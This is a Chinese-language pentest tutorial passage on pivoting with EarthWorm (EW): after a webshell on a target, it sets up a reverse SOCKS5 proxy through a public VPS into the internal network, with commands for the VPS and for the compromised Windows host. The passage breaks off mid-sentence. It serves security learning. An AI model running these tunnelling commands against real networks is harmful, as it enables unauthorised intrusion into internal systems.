内网穿透工具:EW(EarthWorm)
下载地址: https://github.com/idlefire/ew
网络拓扑:Kali Linux是我本地的一台虚拟机,Ubuntu是公网上的一台 vps,Windows 10 是目标机器,内网IP,部分端口映射到外网,可以访问公网。
现在已拿到目标内网一台机器的权限(该机器将80端口映射至外网,Web服务存在漏洞,已拿到webshell)。需要对内网做进一步的渗透,目前我有一台公网的Ubuntu,一台内网的Kali,如何反向Socks5**将Kali的流量代理进目标内网**?
该使用场景为:
此处仅演示通过EW做反向Socks5代理,正向、多级级联的的代理方式可以参考官方文档。
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
该命令的意思是说公网机器监听1080和1024端口。等待攻击者机器访问1080端口,目标机器访问1024端口。
ew_for_Win.exe -s rssocks -d 144.168.57.70 -e 1024
其中-d参数的值为刚刚的公网IP。
Windows 10 目标机器:
注意这里访问了 1024 端口。
方法一:Kali 浏览器设置Soc